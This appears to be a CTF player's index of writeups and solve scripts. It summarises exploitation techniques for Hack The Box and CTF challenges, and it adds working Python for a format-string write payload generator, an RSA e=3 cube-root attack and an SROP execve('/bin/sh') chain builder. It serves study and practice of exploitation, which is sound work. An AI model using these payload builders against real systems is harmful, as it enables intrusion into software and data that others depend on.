pwnscripts | tl;dr |
---|---|
https://gist.github.com/blackbeard666/ | Solve scripts for challs that I don't have the time to create writeups for (or whose basic idea has already been covered in other writeups here, with only a few additions). I might still create writeups for them though. |
Hack The Box | tl;dr |
---|---|
Script Kiddie | [--redacted--] |
Armageddon | [--redacted--] |
Laboratory | gitlab 12.8.1 RCE, PATH variable manipulation against the docker-security SUID binary |
Love | [--redacted--] |
Spectra | [--redacted--] |
Knife | [--redacted--] |
Delivery | ticket tricks, rule-based hashcat |
Ready | gitlab 11.4.7 SSRF/CSRF RCE, privileged Docker container breakout by mounting the host filesystem |
Tenet | [--redacted--] |
Ophiuchi | [--redacted--] |
The Notebook | [--redacted--] |
Pit | [--redacted--] |
Atom | [--redacted--] |
Monitors | [--redacted--] |
Tryhackme | tl;dr | tags
---|---|---
Inferno | bruteforce HTTP basic auth, find the CVE for the web IDE, write forged privileges via tee | http basic auth, codiad cve, tee privesc
Watcher | multiple privesc steps using different techniques | lfi, cronjobs, multiple privesc, python library hijacking
HTB: CyberApocalypse | tl;dr | tags
---|---|---
Controller | a negative index leads to an integer overflow, which leads to a bof | integer overflow, z3
Minefield | arbitrary write primitive used to control a destructor for RCE | fini_array, destructors
Harvester | just the simple stuff, made more complicated by a pokemon-themed menu | canary leak, format string, bof
Save the Environment | use the libc environ pointer to leak a stack address, then overwrite the return address on the stack | environ variable
SanDiego CTF | tl;dr | tags
---|---|---
Flag Dropper | ret2shellcode |
Unique Lasso | SIGROP | syscall loop; mov rax, rdx
Pragyan CTF | tl;dr | tags
---|---|---
login | format string to overwrite a size field, enabling a buffer overflow | fmtstr_payload()
cachetroubles | heap feng shui to get a double free across tcache + unsortedbin | libc-2.31
angstrom CTF | tl;dr | tags
---|---|---
pawn | still studying | [--redacted--]
carpal tunnel syndrome | still studying | [--redacted--]
raiid shadow legends | c++ uaf | c++ raii, uaf, c++ alloc internals
Foobar CTF | tl;dr | tags
---|---|---
deathnote | partial solve; fastbin attack, allocate a misaligned chunk overlapping __malloc_hook so the malloc size check passes, then overwrite the hook | libc 2.23, fastbin attack, __malloc_hook misaligned technique
rOw Row roW | seccomp -> open-read-write shellcode | seccomp, orw, shellcode
Volga Quals | tl;dr | tags
---|---|---
pennywise | off-by-one to control a chunk pointer which is then added to a bin list | format string, off-by-one
Securinets Quals | tl;dr | tags
---|---|---
killshot | format string to leak, write-what-where (www) primitive, ROP chain placed on a heap chunk | tcache_perthread_struct, printf www, heap rop, seccomp, analysis
deathnote | uaf, overwrite a tcache entry in tcache_perthread_struct to point at __free_hook | tcache poison, negative index write
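The `fmtstr_payload()` entry for login and the printf write-what-where in killshot both rest on the same primitive. As an added example, not either solve script: a minimal stand-in for pwntools' fmtstr_payload() that turns address/value pairs into byte-wise `%hhn` writes, plus a toy model of glibc printf to check the generated string offline. The argument offset (6) and the target address (0x404040) are constructed for the demo; in a real solve the offset comes from probing with `%N$p`.

```python
import re
import struct


def fmtstr_write(offset: int, writes: dict, size: int = 4) -> bytes:
    """Build a printf format string that writes each value in `writes`
    (addr -> int, little-endian, `size` bytes wide) one byte at a time with
    %hhn, the way pwntools' fmtstr_payload() does.

    `offset` is the 1-based printf argument index where the first 8 bytes of
    this payload show up (find it with %N$p).  The payload is assumed to start
    on an 8-byte stack slot and to be the only output of the printf call.
    """
    byte_writes = [(addr + i, (value >> (8 * i)) & 0xff)
                   for addr, value in sorted(writes.items())
                   for i in range(size)]
    fmt_len = 0
    for _ in range(16):                          # fixpoint: spec lengths depend on indices
        slots = (fmt_len + 7) // 8               # qwords occupied by the specifiers
        fmt, printed = b"", 0
        for i, (_addr, b) in enumerate(byte_writes):
            pad = (b - printed) % 256            # %hhn stores the count modulo 256
            if pad:
                fmt += b"%%%dc" % pad
                printed += pad
            fmt += b"%%%d$hhn" % (offset + slots + i)
        if len(fmt) == fmt_len:
            break
        fmt_len = len(fmt)
    else:
        raise RuntimeError("format string length did not converge")
    fmt = fmt.ljust(slots * 8, b"A")             # align so the addresses land in whole slots
    addrs = b"".join(struct.pack("<Q", addr) for addr, _ in byte_writes)
    return fmt + addrs                           # addresses last: their NUL bytes end the string


_SPEC = re.compile(rb"%(\d*)c|%(\d+)\$hhn")


def simulate_printf(payload: bytes, offset: int) -> dict:
    """Toy glibc-printf model for the specifiers fmtstr_write() emits.
    Argument `offset + j` is the j-th qword of the payload itself, as it
    would be when the payload sits on the stack.  Returns {addr: byte}."""
    fmt = payload.split(b"\x00", 1)[0]           # the C string ends at the first NUL
    args = {offset + j: struct.unpack_from("<Q", payload, 8 * j)[0]
            for j in range(len(payload) // 8)}
    mem, printed, pos = {}, 0, 0
    while pos < len(fmt):
        m = _SPEC.match(fmt, pos)
        if m is None:                            # a literal byte is echoed
            printed += 1
            pos += 1
            continue
        if m.group(1) is not None:               # %Nc prints max(N, 1) bytes
            printed += max(int(m.group(1) or b"1"), 1)
        else:                                    # %k$hhn stores the low byte of the count
            mem[args[int(m.group(2))]] = printed & 0xff
        pos = m.end()
    return mem


if __name__ == "__main__":
    # Constructed scenario: overwrite a 4-byte size field at the hypothetical
    # address 0x404040 with 0x41424344, payload reachable as argument 6.
    payload = fmtstr_write(6, {0x404040: 0x41424344})
    print(payload)
    print({hex(a): hex(v) for a, v in sorted(simulate_printf(payload, 6).items())})
```

Because each `%hhn` only stores the count modulo 256, the generator never needs to sort by value; it just pads to the next byte. If the vulnerable printf prints anything before your buffer, start `printed` at that length.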
Nahamcon CTF | tl;dr | tags
---|---|---
meddle | usual tcache challenge, but with a tricky way to write to chunks | tcache poison, libc 2.27, misaligned input
BsidesSF CTF | tl;dr | tags
---|---|---
runme 1,2,3 | syscall/int 0x80 bytes were not allowed | self-modifying shellcode
reverseme 1,2 | xor-encoded, the latter part was rng-based | encoded shellcode
Charge Tracker | hardcoded flag, but I wanted to try something | adb dumpsys
zer0pts ctf | tl;dr | tags
---|---|---
Not beginner's stack | read more about stack shadow | stack shadow
Darkcon CTF | tl;dr | tags
---|---|---
Intro | prologue | info
Easy-ROP | bof + multiple approaches | pwn, x64, sigrop
Warmup | double free for leak and poison | pwn, x64, libc-2.27, double free, tcache poison
ezpz | exposed log messages | android rev, adb logcat
Take it Easy | used an online sympy IDE to perform the attack | crypto, low exponent attack, e = 3
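The e = 3 entry above is the textbook low-exponent case: with no padding and a short message, m^3 never wraps the modulus, so the ciphertext is a plain integer cube. Added example, not the author's sympy session: an integer k-th root plus the small-k extension for a cube that wraps the modulus a few times. The key is constructed here from two known primes (the NIST P-192 and P-384 field primes) so the block runs offline.

```python
def iroot(n: int, k: int) -> int:
    """Floor of the integer k-th root of n, by Newton's method on big ints:
    start above the root and iterate downward until the sequence stops falling."""
    if n < 0:
        raise ValueError("n must be non-negative")
    if n < 2:
        return n
    x = 1 << ((n.bit_length() + k - 1) // k)     # power of two >= the true root
    while True:
        y = ((k - 1) * x + n // pow(x, k - 1)) // k
        if y >= x:
            return x
        x = y


def low_exponent_attack(c: int, n: int, e: int = 3, max_k: int = 1 << 16):
    """If m**e < n the ciphertext *is* m**e, so m = iroot(c, e).  If the power
    only slightly wraps the modulus, m**e = c + k*n for a small k; try k in
    order until a perfect e-th power appears.  Returns (m, k) or None."""
    for k in range(max_k):
        cand = c + k * n
        m = iroot(cand, e)
        if pow(m, e) == cand:
            return m, k
    return None


# Constructed RSA key for the demo.  The factors are the NIST P-192 and P-384
# field primes, chosen because both are congruent to 2 mod 3, which makes
# e = 3 invertible modulo phi(n) (so the key is a valid one, not just a modulus).
P = 2**192 - 2**64 - 1
Q = 2**384 - 2**128 - 2**96 + 2**32 - 1
N = P * Q                                        # just under 576 bits
E = 3
D = pow(E, -1, (P - 1) * (Q - 1))                # Python 3.8+


def encrypt(m: int) -> int:
    return pow(m, E, N)


def decrypt(c: int) -> int:
    return pow(c, D, N)


if __name__ == "__main__":
    m = int.from_bytes(b"flag{e=3}", "big")      # 72 bits, so m**3 is far below N
    m_rec, k = low_exponent_attack(encrypt(m), N)
    print(m_rec.to_bytes(9, "big"), k)           # b'flag{e=3}' 0
    m_big = (1 << 193) + 0x1337                  # m**3 is a little over 8*N, so k = 8
    print(low_exponent_attack(encrypt(m_big), N) == (m_big, 8))  # True
```

The fix on the defender's side is not a bigger e but proper padding (OAEP): with random padding the plaintext is as large as the modulus and the cube always wraps many times, so no small k exists.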
Trollcat CTF | tl;dr | tags
---|---|---
msgbox | simple stuff | tcache poison
0x41414141 CTF | tl;dr | tags
---|---|---
moving signals | simple stuff | sigrop
external | the program cleared the GOT after the overflow, needed a way to fix it | fixing GOT, rop
echo | most fmtstr challs are named echo; this one isn't | not fmtstr
return of the rops | learn ret2csu, dummy | unintended solve
babyheap | my first heap solve! | tcache double free
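SIGROP appears three times in this index (Unique Lasso, Easy-ROP, moving signals). Added example, not any of those solve scripts: building the x86-64 rt_sigreturn frame by hand, in the slot order pwntools' SigreturnFrame uses, and assembling the usual pop rax / syscall / frame chain. The gadget addresses, the buffer-to-return-address offset and the "/bin/sh" address are hypothetical placeholders that a real solve would pull from the binary.

```python
import struct

# Slot order of the x86-64 rt_sigreturn frame (ucontext) as laid out by
# pwntools' SigreturnFrame: 31 qwords, 248 bytes.  rdi is at 0x68, rax at
# 0x90, rsp at 0xa0, rip at 0xa8, csgsfs at 0xb8.
SROP_FIELDS = (
    "uc_flags", "&uc", "uc_stack.ss_sp", "uc_stack.ss_flags", "uc_stack.ss_size",
    "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15",
    "rdi", "rsi", "rbp", "rbx", "rdx", "rax", "rcx", "rsp", "rip",
    "eflags", "csgsfs", "err", "trapno", "oldmask", "cr2",
    "&fpstate", "__reserved", "sigmask",
)
FRAME_SIZE = 8 * len(SROP_FIELDS)
SYS_RT_SIGRETURN = 15
SYS_EXECVE = 59
MASK64 = (1 << 64) - 1


def frame_offset(field: str) -> int:
    """Byte offset of a register inside the frame (what you check in gdb)."""
    return 8 * SROP_FIELDS.index(field)


def build_frame(**regs) -> bytes:
    """Serialize a frame.  Everything defaults to 0 except csgsfs = 0x33
    (cs = 0x33, the 64-bit user code selector).  Unknown names are rejected
    so a typo cannot silently leave a register zeroed."""
    values = dict.fromkeys(SROP_FIELDS, 0)
    values["csgsfs"] = 0x33
    for name, val in regs.items():
        if name not in values:
            raise KeyError(f"unknown frame field {name!r}")
        values[name] = val & MASK64
    return struct.pack("<31Q", *(values[f] for f in SROP_FIELDS))


def parse_frame(blob: bytes) -> dict:
    """Inverse of build_frame(); handy for decoding a frame dumped from memory."""
    if len(blob) != FRAME_SIZE:
        raise ValueError(f"frame must be {FRAME_SIZE} bytes")
    return dict(zip(SROP_FIELDS, struct.unpack("<31Q", blob)))


def srop_execve_chain(ret_offset: int, pop_rax_ret: int, syscall_ret: int,
                      binsh_addr: int) -> bytes:
    """Classic SROP payload for a stack overflow (all addresses hypothetical,
    supplied by the caller):
      1. `pop rax; ret` loads rax = 15 (rt_sigreturn),
      2. `syscall; ret` runs it; the kernel reads the frame starting at rsp,
      3. the restored context has rax = 59, rdi = &"/bin/sh", rsi = rdx = 0
         and rip = `syscall; ret`, so execution resumes straight into execve().
    rsp in the frame is left 0; it only matters if execve() fails."""
    frame = build_frame(rax=SYS_EXECVE, rdi=binsh_addr, rsi=0, rdx=0,
                        rip=syscall_ret)
    return (b"A" * ret_offset
            + struct.pack("<QQQ", pop_rax_ret, SYS_RT_SIGRETURN, syscall_ret)
            + frame)


if __name__ == "__main__":
    chain = srop_execve_chain(ret_offset=40, pop_rax_ret=0x401001,
                              syscall_ret=0x401004, binsh_addr=0x402000)
    frame = parse_frame(chain[-FRAME_SIZE:])
    print(hex(frame_offset("rax")), frame["rax"], hex(frame["rip"]))  # 0x90 59 0x401004
```

When no `pop rax` gadget exists, the rax = 15 step is usually done by returning into a `read()` that reads exactly 15 bytes, since the syscall's return value lands in rax; the frame itself stays the same.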
- Grimmcon CTF
- Vulncon CTF
- XMAS CTF
- boot2root CTF
- DefCamp CTF
- InterIUT CTF
- Square CTF
- Sunshine CTF
- Newark Academy CTF
- CyberYoddha CTF
- Razi CTF
- HackLu CTF
- DamCTF
  - allokay
  - finger-warmup
  - schlage
  - malware phase 1
- b01lers bootcamp CTF
- Bsides Delhi CTF
- Bsides Boston CTF
- EKOPARTY CTF
- Dark CTF
- DownUnder CTF
- CSAW Qualifiers
- Google CTF
- Fword CTF
- Arab Sec Cyber Wargames Qualifiers
  - check
  - DOOM